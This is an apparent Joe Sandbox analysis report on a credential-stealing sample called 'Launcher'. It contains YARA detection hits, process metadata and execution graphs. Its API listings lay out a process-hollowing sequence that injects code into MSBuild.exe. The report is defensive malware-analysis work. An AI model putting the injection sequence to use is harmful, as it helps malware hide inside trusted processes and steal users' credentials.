                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2347665217.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2318603921.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2344743144.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                          Start time:17:49:57
                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 600
                                                                                                                                                                                                                                                          Imagebase:0x720000
                                                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:8.7%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                                                                                                                            Signature Coverage:5.1%
                                                                                                                                                                                                                                                            Total number of Nodes:294
                                                                                                                                                                                                                                                            Total number of Limit Nodes:10
                                                                                                                                                                                                                                                            execution_graph 20537 9fc19e 20538 9fc1d4 20537->20538 20539 9fc321 GetPEB 20538->20539 20540 9fc333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 20538->20540 20539->20540 20540->20538 20541 9fc3da WriteProcessMemory 20540->20541 20542 9fc41f 20541->20542 20543 9fc424 WriteProcessMemory 20542->20543 20544 9fc461 WriteProcessMemory Wow64SetThreadContext ResumeThread 20542->20544 20543->20542 20861 9d109a 33 API calls std::_Throw_Cpp_error 20940 9ca590 48 API calls 20862 9d2e90 79 API calls 20863 9d788f 7 API calls ___scrt_uninitialize_crt 20942 9d7389 56 API calls 4 library calls 20943 9d1589 DeleteCriticalSection 20701 9d1a88 20724 9d19f9 GetModuleHandleExW 20701->20724 20704 9d1ace 20706 9d19f9 Concurrency::details::_Reschedule_chore GetModuleHandleExW 20704->20706 20708 9d1ad4 20706->20708 20712 9d1af5 20708->20712 20746 9d19dc GetModuleHandleExW 20708->20746 20711 9d1ae5 20711->20712 20713 9d1aeb FreeLibraryWhenCallbackReturns 20711->20713 20726 9ce250 20712->20726 20713->20712 20715 9d19f9 Concurrency::details::_Reschedule_chore GetModuleHandleExW 20716 9d1b0b 20715->20716 20717 9d1b39 20716->20717 20718 9cb1f0 47 API calls 20716->20718 20719 9d1b17 20718->20719 20720 9d386f ReleaseSRWLockExclusive 20719->20720 20721 9d1b2a 20720->20721 20721->20717 20747 9d34df WakeAllConditionVariable 20721->20747 20725 9d1a0f 20724->20725 20725->20704 20735 9cb1f0 20725->20735 20748 9c4560 20726->20748 20728 9ce271 std::_Throw_Cpp_error 20752 9cf1c0 20728->20752 20731 9ce29f 20732 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20731->20732 20733 9ce2a9 20732->20733 20733->20715 20736 9cb204 std::_Throw_Cpp_error 20735->20736 20839 9d385e 20736->20839 20740 9cb23d 20743 9d386f 20740->20743 20741 9cb221 20741->20740 20843 9d1c19 40 API calls 2 library calls 20741->20843 20744 9d387c ReleaseSRWLockExclusive 20743->20744 20745 9d388a 20743->20745 20744->20745 20745->20704 20746->20711 20747->20717 20749 9c4590 20748->20749 20750 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20749->20750 20751 9c459d 20750->20751 20751->20728 20753 9c4560 5 API calls 20752->20753 20754 9cf1e1 std::_Throw_Cpp_error 20753->20754 20760 9d0010 20754->20760 20755 9cf1f3 20756 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20755->20756 20757 9ce297 20756->20757 20759 9ce2e0 CloseThreadpoolWork std::_Throw_Cpp_error 20757->20759 20759->20731 20761 9d0027 20760->20761 20766 9d0160 20761->20766 20763 9d002e std::_Throw_Cpp_error 20764 9d0036 20763->20764 20773 9d0220 20763->20773 20764->20755 20778 9cd560 20766->20778 20768 9d0187 20781 9cd690 20768->20781 20771 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20772 9d01e1 20771->20772 20772->20763 20788 9d0260 20773->20788 20776 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20777 9d0250 20776->20777 20777->20764 20779 9cb1f0 47 API calls 20778->20779 20780 9cd57e 20779->20780 20780->20768 20784 9cb2a0 20781->20784 20785 9cb2b1 std::_Throw_Cpp_error 20784->20785 20786 9d386f ReleaseSRWLockExclusive 20785->20786 20787 9cb2b9 20786->20787 20787->20771 20789 9d0281 20788->20789 20798 9d0430 20789->20798 20791 9d02c1 20801 9d03c0 20791->20801 20795 9d02e7 20796 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20795->20796 20797 9d0243 20796->20797 20797->20776 20808 9d0570 20798->20808 20800 9d0450 20800->20791 20802 9d03e4 20801->20802 20823 9d0500 20802->20823 20804 9d03ff 20805 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20804->20805 20806 9d02d1 20805->20806 20807 9d0300 143 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 20806->20807 20807->20795 20809 9d05a1 20808->20809 20814 9d05e0 20809->20814 20811 9d05b4 20812 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20811->20812 20813 9d05cb 20812->20813 20813->20800 20815 9d05f7 20814->20815 20818 9d0620 20815->20818 20817 9d0605 20817->20811 20819 9d063d 20818->20819 20821 9d0645 Concurrency::details::_ContextCallback::_CallInContext 20819->20821 20822 9d0670 31 API calls 2 library calls 20819->20822 20821->20817 20822->20821 20824 9d0514 Concurrency::details::_ContextCallback::_CallInContext 20823->20824 20825 9d051c Concurrency::details::_ContextCallback::_CallInContext 20824->20825 20832 9d1da0 RaiseException Concurrency::cancel_current_task 20824->20832 20829 9d0790 20825->20829 20833 9d0830 20829->20833 20836 9d0850 20833->20836 20837 9cb9e0 Concurrency::details::_ContextCallback::_CallInContext 134 API calls 20836->20837 20838 9d0539 20837->20838 20838->20804 20844 9d388e GetCurrentThreadId 20839->20844 20842 9d1c19 40 API calls 2 library calls 20845 9d38b8 20844->20845 20846 9d38d7 20844->20846 20847 9d38bd AcquireSRWLockExclusive 20845->20847 20855 9d38cd 20845->20855 20848 9d38f7 20846->20848 20849 9d38e0 20846->20849 20847->20855 20851 9d3956 20848->20851 20857 9d390f 20848->20857 20850 9d38eb AcquireSRWLockExclusive 20849->20850 20849->20855 20850->20855 20853 9d395d TryAcquireSRWLockExclusive 20851->20853 20851->20855 20852 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20854 9cb20c 20852->20854 20853->20855 20854->20741 20854->20842 20855->20852 20857->20855 20858 9d3946 TryAcquireSRWLockExclusive 20857->20858 20859 9d454d GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 20857->20859 20858->20855 20858->20857 20859->20857 20944 9d4188 49 API calls _unexpected 20945 9c7180 31 API calls std::_Throw_Cpp_error 20947 9e1dbc GetProcessHeap 20948 9d47bb GetModuleHandleW GetProcAddress GetProcAddress 20950 9d4bbb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 20954 9d53b1 8 API calls 20956 9cadb0 29 API calls std::_Throw_Cpp_error 20870 9d10b0 32 API calls std::_Throw_Cpp_error 20958 9d2db0 78 API calls _Yarn 20959 9e0fa7 FreeLibrary 20960 9c33a0 14 API calls 20962 9d81a3 75 API calls 20964 9dcfd5 7 API calls 20876 9d7ad4 82 API calls 2 library calls 20965 9e3bd7 52 API calls 2 library calls 20968 9e1dce 34 API calls 2 library calls 20882 9e06cd 16 API calls __dosmaperr 20884 9d2cc8 45 API calls 2 library calls 20972 9ca7c0 134 API calls 20887 9eb6f5 58 API calls 20976 9ef1e5 IsProcessorFeaturePresent 20893 9c1ae0 6 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 20978 9ca5e0 70 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 20979 9c69e0 5 API calls 2 library calls 20980 9d2fe1 75 API calls 20894 9ee81f 20 API calls 20983 9c5510 104 API calls 3 library calls 20984 9cad10 48 API calls 20902 9d7a0c 15 API calls 2 library calls 20903 9e5c0c 51 API calls 3 library calls 20907 9ca800 50 API calls 20985 9ccf00 71 API calls 20986 9d1100 57 API calls 2 library calls 20908 9d323e 81 API calls shared_ptr 20545 9d4a39 20546 9d4a45 ___scrt_is_nonwritable_in_current_image 20545->20546 20571 9d13e2 20546->20571 20548 9d4a4c 20549 9d4ba5 20548->20549 20559 9d4a76 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 20548->20559 20597 9d4073 4 API calls 2 library calls 20549->20597 20551 9d4bac 20598 9da4bd 21 API calls _unexpected 20551->20598 20553 9d4bb2 20599 9da4d3 21 API calls _unexpected 20553->20599 20555 9d4bba 20556 9d4a95 20557 9d4b16 20582 9dca3c 20557->20582 20559->20556 20559->20557 20593 9da507 48 API calls 4 library calls 20559->20593 20561 9d4b1c 20586 9c1c00 20561->20586 20565 9d4b3d 20565->20551 20566 9d4b41 20565->20566 20567 9d4b4a 20566->20567 20595 9da4e9 21 API calls _unexpected 20566->20595 20596 9d141b 79 API calls ___scrt_uninitialize_crt 20567->20596 20570 9d4b53 20570->20556 20572 9d13eb 20571->20572 20600 9d3cdf IsProcessorFeaturePresent 20572->20600 20574 9d13f7 20601 9d53c5 10 API calls 2 library calls 20574->20601 20576 9d13fc 20581 9d1400 20576->20581 20602 9d78ff 20576->20602 20579 9d1417 20579->20548 20581->20548 20583 9dca45 20582->20583 20585 9dca4a 20582->20585 20615 9dcb65 68 API calls 20583->20615 20585->20561 20616 9c2620 20586->20616 20590 9c1c3a 20624 9d11f9 20590->20624 20592 9c1c73 20594 9d4020 GetModuleHandleW 20592->20594 20593->20557 20594->20565 20595->20567 20596->20570 20597->20551 20598->20553 20599->20555 20600->20574 20601->20576 20606 9e27a5 20602->20606 20605 9d53e4 7 API calls 2 library calls 20605->20581 20607 9d1409 20606->20607 20608 9e27b5 20606->20608 20607->20579 20607->20605 20608->20607 20610 9e1f19 20608->20610 20611 9e1f20 20610->20611 20612 9e1f63 GetStdHandle 20611->20612 20613 9e1fc5 20611->20613 20614 9e1f76 GetFileType 20611->20614 20612->20611 20613->20608 20614->20611 20615->20585 20617 9c264c 20616->20617 20631 9ca1f0 20617->20631 20620 9c2670 20621 9c2684 20620->20621 20622 9c2698 20621->20622 20699 9cb2c0 40 API calls Concurrency::cancel_current_task 20621->20699 20622->20590 20625 9d1201 20624->20625 20626 9d1202 IsProcessorFeaturePresent 20624->20626 20625->20592 20628 9d3bd1 20626->20628 20700 9d3cb7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20628->20700 20630 9d3cb4 20630->20592 20640 9ca330 20631->20640 20635 9ca232 20656 9ca3c0 20635->20656 20637 9ca248 20638 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20637->20638 20639 9c1c32 20638->20639 20639->20620 20662 9d0eb0 20640->20662 20643 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20644 9ca21d 20643->20644 20645 9ca2a0 20644->20645 20646 9ca2fb 20645->20646 20647 9ca2bb 20645->20647 20648 9d1185 codecvt 16 API calls 20646->20648 20647->20646 20649 9ca2cc 20647->20649 20650 9ca30c 20648->20650 20671 9d1185 20649->20671 20684 9ca490 144 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 20650->20684 20653 9ca2ed 20653->20635 20657 9ca3d4 20656->20657 20658 9ca3e8 20657->20658 20697 9cb2c0 40 API calls Concurrency::cancel_current_task 20657->20697 20660 9ca401 20658->20660 20698 9cb2c0 40 API calls Concurrency::cancel_current_task 20658->20698 20660->20637 20667 9d0f00 20662->20667 20665 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20666 9ca35d 20665->20666 20666->20643 20668 9d0f29 20667->20668 20669 9d11f9 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20668->20669 20670 9d0ee0 20669->20670 20670->20665 20673 9d118a 20671->20673 20674 9ca2dd 20673->20674 20676 9d11a6 20673->20676 20685 9de3ac 20673->20685 20692 9da7ef EnterCriticalSection LeaveCriticalSection codecvt 20673->20692 20683 9ca450 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20674->20683 20677 9d3ac2 codecvt 20676->20677 20678 9d11b0 Concurrency::cancel_current_task 20676->20678 20694 9d4d23 RaiseException 20677->20694 20693 9d4d23 RaiseException 20678->20693 20681 9d3ade 20682 9d1ccf 20683->20653 20684->20653 20690 9e04c1 __Getctype 20685->20690 20686 9e04ff 20696 9dc664 14 API calls __dosmaperr 20686->20696 20688 9e04ea RtlAllocateHeap 20689 9e04fd 20688->20689 20688->20690 20689->20673 20690->20686 20690->20688 20695 9da7ef EnterCriticalSection LeaveCriticalSection codecvt 20690->20695 20692->20673 20693->20682 20694->20681 20695->20690 20696->20689 20700->20630 20989 9d113a 87 API calls std::_Throw_Cpp_error 20910 9e1e37 15 API calls 20992 9d7b2c GetCommandLineA GetCommandLineW 20912 9d302f 77 API calls 20993 9e5d2c 50 API calls 3 library calls 20994 9d2b29 47 API calls 2 library calls 20915 9d182a 16 API calls 2 library calls 20916 9d4a27 30 API calls 20920 9d5223 54 API calls 2 library calls 21000 9e595a 53 API calls 3 library calls 20922 9d2a5a 31 API calls 21002 9d4355 DecodePointer 21003 9df557 55 API calls 2 library calls 20924 9c2450 112 API calls 21004 9c4950 107 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 21005 9ccf50 143 API calls 3 library calls 20929 9d5440 49 API calls 5 library calls 21009 9d1942 9 API calls 3 library calls 21010 9e237c LeaveCriticalSection std::_Lockit::~_Lockit 20930 9e507d 50 API calls 3 library calls 21014 9d4974 80 API calls 2 library calls 21015 9d4b74 21 API calls _unexpected 20934 9d306b 77 API calls 20936 9c3260 30 API calls 20937 9c6860 58 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 20938 9cbe60 71 API calls

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,009FC110,009FC100), ref: 009FC334
                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 009FC347
                                                                                                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 009FC365
                                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(00000098,?,009FC154,00000004,00000000), ref: 009FC389
                                                                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 009FC3B4
                                                                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 009FC40C
                                                                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 009FC457
                                                                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 009FC495
                                                                                                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(0000009C,01380000), ref: 009FC4D1
                                                                                                                                                                                                                                                            • ResumeThread.KERNELBASE(0000009C), ref: 009FC4E0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                            • API String ID: 2687962208-3857624555
                                                                                                                                                                                                                                                            • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                            • Instruction ID: 7c9a1c5866174c7c7f5f4b866d76168c6d3d76c471fa5273da7e385c32f40e1e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAB1087264024AAFDB60CF68CD80BEA73A5FF88714F158524EA0CAB341D774FA51CB94

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 1378416451-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 1314b5a79ad2d3ce03a7649edb2c25948a4a3d25cfcc1b9da581cdbe7e35fb2c
                                                                                                                                                                                                                                                            • Instruction ID: bd13881a7ae4503d6fdb2997dc5b68db402ab3e809213fcde1b92e274d784f9e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1314b5a79ad2d3ce03a7649edb2c25948a4a3d25cfcc1b9da581cdbe7e35fb2c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A718EB0D092489FDB00EFA8D598B9DBBF0BF49304F10892DE499AB391D734A945CF56

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 60 9c7d50-9c7db5 61 9c7dbb-9c7dcc 60->61 62 9c7df0-9c7e13 call 9c60a0 60->62 63 9c7de4-9c7dea 61->63 64 9c7dd2-9c7dde 61->64 67 9c7e19-9c7e25 62->67 68 9c7e2a-9c7e42 62->68 63->62 64->63 69 9c7ea0-9c7fe0 call 9de850 call 9de384 call 9de850 call 9c3fa0 call 9c60c0 call 9c3fd0 call 9c61d0 call 9c6270 call 9c6230 call 9c3fa0 call 9c6290 call 9c3fd0 call 9c63a0 call 9c63d0 67->69 70 9c7e48-9c7e58 68->70 71 9c7e9b 68->71 103 9c7fe6-9c8011 call 9c8910 call 9c6270 69->103 104 9c8013-9c801a 69->104 70->71 72 9c7e5e-9c7e6f 70->72 71->69 74 9c7e8c-9c7e95 72->74 75 9c7e75-9c7e86 72->75 74->71 75->71 75->74 103->104 106 9c8020-9c8029 104->106 107 9c8141-9c815a call 9c1d90 call 9c6500 104->107 108 9c802f-9c803b 106->108 109 9c8040-9c8046 106->109 121 9c8176-9c8180 107->121 122 9c8160-9c8170 call 9c6500 107->122 112 9c804c-9c806c call 9c6270 108->112 109->112 120 9c8072-9c8086 112->120 123 9c808c-9c80a1 120->123 124 9c80c7-9c80cf 120->124 126 9c8196-9c81b0 call 9c60a0 121->126 122->121 138 9c8185-9c8190 call 9c6500 122->138 123->124 127 9c80a7-9c80c1 123->127 129 9c80da-9c8122 call 9c63f0 124->129 130 9c80d5-9c813c 124->130 136 9c81b6-9c81c0 126->136 137 9c82a1-9c82ab 126->137 127->124 144 9c8128-9c8131 129->144 145 9c8137 129->145 130->107 136->137 140 9c81c6-9c829c call 9c6520 call 9c6270 call 9c65a0 136->140 141 9c839e-9c8424 call 9c6270 call 9c65a0 137->141 142 9c82b1-9c8399 call 9c6270 call 9c65a0 call 9c6520 137->142 138->126 162 9c842c-9c84a2 call 9c6270 call 9c65a0 140->162 159 9c8427 141->159 142->159 144->145 145->120 159->162 168 9c84a7-9c854c call 9c6630 call 9c6520 call 9c1e40 * 2 call 9d11f9 162->168
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strcspn
                                                                                                                                                                                                                                                            • String ID: @$A2sx
                                                                                                                                                                                                                                                            • API String ID: 3709121408-3562078102
                                                                                                                                                                                                                                                            • Opcode ID: c19c17ca25b268d22860eb2af5a0ba0f7de5d96a539c6b09ef8a05fcd853a607
                                                                                                                                                                                                                                                            • Instruction ID: 021b09042087612993ace7ea103b7f29d603d57ee531f819e6de0c38124d7928
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c19c17ca25b268d22860eb2af5a0ba0f7de5d96a539c6b09ef8a05fcd853a607
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8032C3B4D042698FCB14DF64C981BDEFBF1AF89300F0585AAE849A7351D734AA85CF52

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleFreeProtectVirtual
                                                                                                                                                                                                                                                            • String ID: @$A2sx
                                                                                                                                                                                                                                                            • API String ID: 621788221-3562078102
                                                                                                                                                                                                                                                            • Opcode ID: d5b5abf8efd5961b8712027ba99d62bfdd5f6b4cc934a40582cfed4f17200b8d
                                                                                                                                                                                                                                                            • Instruction ID: 28193ef9102c7955d17c1b772dee51aad766b310976c30772de0815cfb7e9b69
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5b5abf8efd5961b8712027ba99d62bfdd5f6b4cc934a40582cfed4f17200b8d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F419EB0D042089FDB04EFA9D584AAEBBF0AF48344F118819E458AB351D7759945CF95

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
